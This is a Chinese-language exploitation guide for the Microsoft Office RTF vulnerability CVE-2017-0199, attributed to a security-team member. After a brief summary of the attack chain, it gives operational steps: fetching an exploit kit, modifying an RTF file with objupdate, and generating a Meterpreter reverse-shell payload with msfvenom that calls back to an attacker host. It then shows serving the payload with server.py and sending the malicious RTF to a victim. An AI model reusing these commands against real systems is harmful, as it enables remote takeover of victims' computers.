CVE-2017-0199:Microsoft Office RTF
漏洞利用指南
From ChaMd5安全团队核心成员 zusheng
一、介绍
FireEye最近检测到利用CVE-2017-0199安全漏洞的恶意Microsoft Office RTF文档,要知道CVE-2017-0199可是此前尚未公开的漏洞。当用户打开包含该漏洞利用代码的文档时,恶意代码就会下载并执行包含PowerShell命令的Visual Basic脚本。 FireEye已经发现了一些通过CVE-2017-0199漏洞下载并执行各种臭名昭著的恶意软件系列的有效载荷的Office文档。
二、攻击场景
攻击的具体方式如下所示:
1. 攻击者通过电子邮件向目标用户发送含有OLE2嵌入式链接对象的Microsoft Word文档。
2. 当用户打开文档时,winword.exe将会向远程服务器发出HTTP请求,以索取恶意HTA文件。
3. 服务器返回的文件是一个带有嵌入式恶意脚本的假RTF文件。
4. Winword.exe通过COM对象查找application / hta的文件处理程序,从而导致Microsoft HTA应用程序(mshta.exe)加载并执行恶意脚本。
三、漏洞利用细节
准备工作:
下载漏洞利用工具包CVE-2017-0199 - v2.0:
https://github.com/haibara3839/CVE-2017-0199-master
漏洞利用工具包CVE-2017-0199 - v2.0是一个非常方便的Python脚本,它可以非常快速有效的利用Microsoft Office RTF漏洞,无需任何复杂的配置。
将innocent.doc和server.py两个文件放置在攻击机上并开启Apache服务
漏洞利用步骤一:制作恶意RTF文件
新建一个Word文档按照下图进行配置
另存为RTF格式
使用文本编辑器软件打开test.rtf文件,在文件中查找objupdate,然后在objautlink后面插入objupdate
漏洞利用步骤二:配置攻击机
使用msfvenom生成反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT=4444 -f exe > shell.exe
运行server.py服务
python server.py 80 http://10.10.10.104/shell.exe /var/www/html/shell.exe
漏洞利用步骤三:攻击完成
将恶意文件test.rtf发给受害者,受害者打开test.rtf
弹出警告框,成功反弹shell
弹弹弹